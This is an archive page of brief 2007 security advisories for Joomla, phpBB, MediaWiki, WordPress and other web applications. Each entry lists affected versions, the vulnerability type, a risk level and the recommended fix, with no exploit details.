Application: Joomla
Affected Version: Joomla!12Pictures 1.x
Vendor’s URL: Component download page
Bug Type: Malicious Access
Risk Level: High
Solution:
Edit the source code or look for patch file.
Archive for September, 2007
Joomla Joomla!12Pictures Component File Inclusion
Published by September 21st, 2007 in Access Bypass.Joomla Joomla!FlashFun Component File Inclusion
Published by September 21st, 2007 in File Inclusion.Application: Joomla
Affected Version: Joomla!FlashFun 1.x
Vendor’s URL: Jooma!FlashFun Homepage
Bug Type: File Inclusion
Risk Level: High
Solution:
Edit the source code & contact to component developer.
phpBB Styles Demo Module Multiples Vulnerability
Published by September 21st, 2007 in Cross Site Scripting and SQL Injection.Application: PhpBB
Affected Version: Styles Demo Module 1.x
Vendor’s URL: PhpBB Homepage
Bug Type: SQL Injection & Cross Site Scripting
Risk Level: Critical
Solution:
Edit the source code & contact to developer.
Joomla Nice Talk Component “tagid” SQL Injection
Published by September 21st, 2007 in SQL Injection.Application: Joomla
Affected Version: Nice Talk 0.x.
Vendor’s URL: Nice Talk Homepage
Bug Type: SQL Injection Attacks
Risk Level: Critical
Solution:
- Edit the source code and ensure the input is sanitised.
Application: Joomla
Affected Version: NeoRecruit 1.x
Vendor’s URL: NeoRecruit DownloadPage
Bug Type: SQL Injection Attack
Risk Level: Critical
Solution:
Update to version 1.4.1.
MediaWiki XSS
Published by September 21st, 2007 in Cross Site Scripting and Remote Command Execution.Application: MediaWiki
Affected Version:
MediaWiki 1.11 < = 1.11.0rc1
MediaWiki 1.10 <= 1.10.1
MediaWiki 1.9 <= 1.9.3
MediaWiki 1.8 <= 1.8.4 (if $wgEnableAPI has been switched on)
Vendor’s URL: MediaWiki HomePage
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Update to version 1.11.0, 1.10.2, 1.9.4, or 1.8.5.
Joomla Restaurante Component File Upload Vulnerability
Published by September 21st, 2007 in Remote Command Execution.Application: Joomla
Affected Version: Restaurante 1.x
Vendor’s URL: Restaurante DownloadPage
Bug Type: Malicious file upload cause script exploit
Risk Level: High
Solution:
Update to latest version.
Wordpress Multiple Vulnerabilities
Published by September 21st, 2007 in Cross Site Scripting and SQL Injection.Application: Wordpress
Affected Version: Wordpress 2.x & Wordpress MU 1.x
Vendor’s URL: Wordpress HomePage
Bug Type: Script Insertion and SQL Injection
Risk Level: Critical
Solution:
Update to Wordpress version 2.2.3 & Wordpress MU version 1.2.5a.
Invision Power Board Multiple Vulnerabilities
Published by September 21st, 2007 in Access Bypass and Cross Site Scripting.Application: Invision Power Board
Affected Version: 2.x
Vendor’s URL: Invision Power Board HomePage
Bug Type: Security bypass & Cross site scripting
Risk Level: Medium
Solution:
Download the latest version.
Apply the patch from vendor by refer instruction given.
Application: Joomla
Affected Version: Joomlaradio 5.x & other version might affected
Vendor’s URL: Joomlaradio DownloadPage
Bug Type: File Inclusion
Risk Level: Critical
Solution:
Edit the source code or consult vendor.
Application: TinyWebGallery
Affected Version: 1.6.3.4 & other version
Vendor’s URL: TinyWebGallery HomePage
Bug Type: Remotely Cross Site Scripting
Risk Level: Medium
Solution:
Edit the source code or consult to application developer.
Application: Coppermine
Affected Version: 1.4.12 and prior version
Vendor’s URL: http://coppermine-gallery.net/
Bug Type: Cross Site Scripting & Exposure of system information
Risk Level: Medium
Solution:
Update to version 1.4.13.
Mambo Component AkoBook Scripts Insertion
Published by September 20th, 2007 in Cross Site Scripting.Application: Mambo
Affected Version: 3.42
Vendor’s URL: http://www.mamboportal.com/
Bug Type: Scripts Insertion Attacks
Risk Level: Medium
Solution:
Edit the source code of components or contact to developer for latest update.
